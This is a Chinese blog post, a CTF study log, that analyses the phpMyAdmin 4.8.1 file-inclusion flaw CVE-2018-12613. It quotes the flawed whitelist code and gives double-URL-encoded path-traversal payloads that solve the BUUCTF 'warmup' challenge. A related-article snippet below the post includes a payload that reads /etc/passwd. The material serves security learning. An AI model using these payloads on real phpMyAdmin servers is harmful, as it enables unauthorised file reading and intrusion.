ctf web方向与php学习记录28之CVE-2018-12613

最新推荐文章于 2022-09-04 14:57:19 发布
最新推荐文章于 2022-09-04 14:57:19 发布
阅读量265 收藏
点赞数
分类专栏: CVE-2018-12613 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/109864728
版权

这次给大家带来我的第一次CEV漏洞分析。
一,以下是我分析与总结的资料。
在这里插入图片描述
二,漏洞分析
(一)漏洞代码分析
1漏洞代码
(1)index.php 50-63
在这里插入图片描述


target_blacklist = array (
    'import.php', 'export.php'
);

// If we have a valid target, let's load that script instead //满足5个条件后就会include $ _REQUEST['target']的内容
if (! empty( $ _REQUEST['target'])                            // $ _REQUEST['target']不为空
    && is_string( $ _REQUEST['target'])                    // $ _REQUEST['target']是字符串
    && ! preg_match('/^index/',  $ _REQUEST['target']) // $ _REQUEST['target']不以index开头
    && ! in_array( $ _REQUEST['target'],  $ target_blacklist)
                                                              // $_REQUEST['target']不在 $ target_blacklist中
    && Core::checkPageValidity( $ _REQUEST['target'])//接下来查看定义的
) {
    include $_REQUEST['target'];
    exit;
}

(2)Core.php 443-476

     public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {  //要求非空且为字符
            return false;
        }

        if (in_array($page, $whitelist)) {           //是否存在于白名单中
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')  
                                     //$_page是$page中从第一个字符到第一个'?'的所有字符。即过滤后面传递的参数 。                                             
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {   //解码后的$_page中是否有'?',即是否传参。
            return true;
        }

        return false;
    }

2漏洞原理
由于第 465 行的 urldecode(),仅仅只进行了一次编码,所以可以把’?'两次url编码为 %253f, 即可绕过验证第二次的$_page的验证。

(二)新老版本对比

在这里插入图片描述

5.0.4版本的core.php的相同行数的内容依旧没有发生改变,而且index.php相同行数上代码的变化并没有本质上的改变,所以我认为漏洞的修复可能出现在其他位置或超出了我目前的认知范围,在此不做深入讨论,知道的大佬可以在评论区留言,谢谢。

三,BUUCTF warmup
首先进入环境可以发现一个source.php进入后可以看见以下源码。

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

然后可以看见有一个hint.php访问一下看一看,获得提示,flag在ffffllllaaaagggg里(后来才意识到),那么接下来就是想办法把ffffllllaaaagggg包含并“访问”,拿到flag的过程了。
在这里插入图片描述

根据相似漏洞phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)的相关知识可以得到playload。

注:…/为向上退回目录,经测试最少四次向上退回目录即可。
下面是我总结的playload。
如下,然后得到flag。
在这里插入图片描述

http://dc45c57e-7336-457b-9a46-3bb8ffb7e348.node3.buuoj.cn/source.php?file=hint.php%253f/…/…/…/…/ffffllllaaaagggg
http://dc45c57e-7336-457b-9a46-3bb8ffb7e348.node3.buuoj.cn/source.php?file=source.php%253f/…/…/…/…/ffffllllaaaagggg

这周末在做梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF中的CVE-2020-7066
qq_45521281的博客
05-29 2599
PHP中get_headers函数 在PHP开发中,我们经常需要获取HTTP请求中发送的服务器信息,本文通过一个简单的PHP示例介绍了通过get_headers函数获取服务器的相关信息。 **get_headers() 是PHP系统级函数,他返回一个包含有服务器响应一个 HTTP 请求所发送的标头的数组。**如果失败则返回 FALSE 并发出一条 E_WARNING 级别的错误信息(可用来判断远程文件是否存在)。 array get_headers ( string $url [, int $format
ctf.show的phpCVE(web311-web315)
wanan的博客
09-30 276
ctf.show的phpCVE(web311-web315)
CTFSHOW--PHPCVE复现
qq_49422880的博客
02-22 3276
CTFSHOW--PHPCVE复现web311[CVE-2019-11043]web312(CVE-2018-19518)web313(CVE-2018-19518)web314:(日志文件包含)web315:(XDebug 远程调试漏洞) web311[CVE-2019-11043] web312(CVE-2018-19518) 同样,没有任何的界面就直接抓包,发现是X-Powered-By: PHP/5.6.38,网上搜索发现是CVE-2018-19518 PHP imap 远程命令执行漏洞。 简介:
CTF两道CVE题目的具体分析
qq_41071646的博客
11-05 1025
在 unctf 里面发现一道 病毒常用的 office 的漏洞 一个是内核漏洞 CVE-2016-0095 和 CVE-2017-11882 开始 先说一下 CVE-2016-0095 这个是内核漏洞 产生的原因是 内核空指针解引用的漏洞 漏洞出现在了 win32k 里面 题目是给了一个poc 然后让修复这个poc 并且拿到 system 的权限 get shell...
XCTF-攻防世界CTF平台-Web类——6、warmup(php中include函数遍历漏洞)
Onlyone_1314的博客
11-15 1503
打开题目地址: 标题栏是Document,只有一张图片,所以我们审计源代码: 有一个source.php打开: 有一段判断页面的代码,还有一个hint.php 提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的: 所以我们继续看source.php中的代码: <?php highlight_file(__FILE__); class emmm { public static fu
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
Rhme-2017:Riscure Hack Me嵌入式硬件CTF 2017-2018
05-16
**Rhme-2017: Riscure Hack Me 嵌入式硬件 CTF 2017-2018** 这篇文章将探讨Riscure Hack Me在2017-2018年举办的嵌入式硬件CTF(Capture The Flag)挑战赛。CTF是一种网络安全竞赛,参赛者通过解决各种技术问题来...
h1-702-ctf-2018-solutions:Hackerone组织的H1702 CTF的代码利用
04-30
【标题】"H1-702-CTF-2018-Solutions" 提供的是针对Hackerone组织在2018年举办的一场名为H1-702的网络安全竞赛(Capture The Flag,CTF)的解题代码。这类竞赛通常涉及多种信息安全技能的测试,包括但不限于逆向工程...
ctf-web网络安全课程视频.zip
10-19
1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
*CTF 2022web(CVE-2021-43798)
……
09-04 1447
CVE-2021-43798漏洞复现 *CTF 2022web
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 1938
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
buuctf [PHPMYADMIN]CVE-2018-12613
qq_1873822的博客
03-16 688
phpMyAdmin版本信息:4.8.1 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/jiyongx/article/details/105240498 任意文件包含 payload /index.php?target=tbl_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 写入shell 第一种姿势 1、写入shell,测试语句: SELECT ‘<?php phpinfo()?>’ index.php?ta.
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2475
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
CTFSHOW php-cve
羽的博客
12-21 1860
web311 CVE-2019-11043 参考文章 工具下载地址https://github.com/neex/phuip-fpizdam ,需要有go环境 go环境安装地址https://golang.google.cn/dl/ 安装的过程很恶心,会timeout。捣鼓了一两个小时才弄好。具体步骤如下 $GOPATH是go安装的目录,记得改成自己的 mkdir -p $GOPATH/src/golang.org/x/ cd $GOPATH/src/golang.org/x/ git clone http
CVE-2018-12613复现
0xdawn的博客
01-31 4600
0x00 漏洞描述 ​ 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ ...
2020/7/13 - [GWCTF 2019]我有一个数据库 - phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613
抒情诗
07-13 364
这是phpmyadmin的一个洞,没有题目的话,很难联想到这个phpmyadmin(用的太少了,还是我会的太少了) 任意文件读取的洞,下面是一篇讲解得不错的文章,分享给你。 文章目录1.扫描目录 1.扫描目录 这个 ...
phpmyadmin4.8.1远程文件包含漏洞(CVE-2018-12613)-hctf218-warmup
Sea_Sand息禅
06-15 2058
用hctf2018的一道题可以重现改漏洞。 根据源码提示进入source.php中,可以拿到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = [...
CTF-web(命令执行漏洞)
分享与记录
04-09 2343
部分web应用程序提供了一些命令执行的操作,如果没有过滤好用户输入的数据,就很有可能形成系统命令执行漏洞。 先上题,这是一个实现ping功能的web界面 ping一下127.0.0.1看看 在window下,&&可以将两条命令连接起来执行,linux下同样适用 127.0.0.1 && ls 感觉这跟SQL注入有点像,所以说有输入的地方就可能存在漏洞,执行上面...
ctf web方向怎么学习
最新发布
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值